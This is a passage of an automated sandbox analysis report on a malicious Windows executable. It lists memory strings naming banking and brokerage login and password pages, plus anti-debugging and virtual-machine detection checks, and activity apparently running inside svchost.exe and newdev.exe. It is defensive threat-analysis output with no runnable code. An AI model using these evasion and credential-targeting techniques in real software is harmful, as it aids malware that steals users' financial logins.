            Source: 0O4Q3IKB.5.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: 0O4Q3IKB.5.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2865661690.0000020FF734D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 0O4Q3IKB.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 0O4Q3IKB.5.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 0O4Q3IKB.5.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 0O4Q3IKB.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 0O4Q3IKB.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bal block list test formVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 0O4Q3IKB.5.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 0O4Q3IKB.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20
            Source: 0O4Q3IKB.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 0O4Q3IKB.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 0O4Q3IKB.5.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 0O4Q3IKB.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 0O4Q3IKB.5.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 0O4Q3IKB.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169648iX,>~
            Source: 0O4Q3IKB.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 0O4Q3IKB.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\psibx9rXra.exeAPI call chain: ExitProcess graph end nodegraph_0-104153
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\newdev.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FF3F09 BlockInput,0_2_00FF3F09
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F83B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83B3A
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FB5A7C
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F84B37 LoadLibraryA,GetProcAddress,0_2_00F84B37
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_01995118 mov eax, dword ptr fs:[00000030h]0_2_01995118
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_019967B8 mov eax, dword ptr fs:[00000030h]0_2_019967B8
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_01996758 mov eax, dword ptr fs:[00000030h]0_2_01996758
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]2_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]2_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]2_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h]2_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
